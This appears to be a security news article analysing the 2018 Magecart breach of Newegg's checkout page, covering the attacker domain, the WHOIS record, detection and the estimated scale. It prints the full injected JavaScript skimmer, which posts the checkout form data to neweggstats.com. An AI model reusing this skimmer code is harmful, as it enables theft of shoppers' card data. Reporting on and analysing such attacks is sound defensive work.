The hackers who planted malicious code onto the British Airways payment pages were siphoning off Newegg payment data for a week before the BA hack had even started. Worryingly, even when British Airways went public with their data breach, it took another two weeks for Newegg to examine their own codebase. In total, the financial data stealing code was in place for 33 days between 16th August and 18th September 2018.

Newegg made a public announcement on Twitter:

Malicious Code

The fraudsters stealing the payment data - collectively known as Magecart - used remarkably similar code and techniques as seen in the British Airways data breach, with only 15 lines of beautified code needed:

window.onload = function() {
    jQuery('#btnCreditCard.paymentBtn.creditcard').bind("mouseup touchend", function(e) {
        var dat1 = jQuery('#checkout');
        var pdati = JSON.stringify(dat1.serializeArray());
        setTimeout(function() {
            jQuery.ajax({
                type: "POST",
                async: true,
                url: "https://neweggstats.com/GlobalData/",
                data: pdati,
                dataType: 'application/json'
            });
        }, 250);
    });
};

Although fairly basic JavaScript, its power is clear in stealing the credit card information of any visitor unfortunate enough to have made their purchase on the Newegg website in the one-month time period.

Infrastructure

Strikingly, the attacks so far have been finely targeted with this breach sending data off to the domain "neweggstats.com", which was registered only days before the theft of Newegg data began. A domain search on domai.nr shows a registration date of the 13th August 2018.

Domain Name: NEWEGGSTATS.COM
   Registry Domain ID: 2296932665_DOMAIN_COM-VRSN
   Registrar WHOIS Server: whois.namecheap.com
   Registrar URL: http://www.namecheap.com
   Updated Date: 2018-08-13T16:36:22Z
   Creation Date: 2018-08-13T16:36:18Z
   Registry Expiry Date: 2019-08-13T16:36:18Z

The domain name was also secured with an SSL certificate from Comodo to encrypt traffic between the browser and the domain "neweggstats.com" so it all seemed more legitimate.

Avoiding Detection

The code injected into the Newegg website remained undetected by being placed on a specific page on the Newegg website, according to research from security company, Volexity:

Volexity was able to verify the presence of malicious JavaScript code limited to a page on secure.newegg.com presented during the checkout process at Newegg. The malicious code specifically appeared once when moving to the Billing Information page while checking out.  This page, located at the URL https://secure.newegg.com/GlobalShopping/CheckoutStep2.aspx, would collect form data, siphoning it back to the attackers over SSL/TLS via the domain neweggstats.com

Scale Of The Attack

Details are not clear right now on how many people will be affected by this data breach. However data from Alexa shows newegg.com is the 164th most popular website in the US with more than 50 millions visitors per month, according to Similar Web.

Even with a relatively low conversion rate of 2%, that's over 1 million customers that could have had their financial data stolen over the one-month period.

Summary

The hacking group known as Magecart seem to be targeting specific, high-traffic websites to cause the maximum damage. Although it is not reasonable to expect the typical internet user to examine the HTTP requests before and after making purchases on a website, it is important for everyone to be aware that these types of attacks are possible - even on the biggest sites in the world.

Always check your bank statements and report suspicious activities to your banks and credit card companies.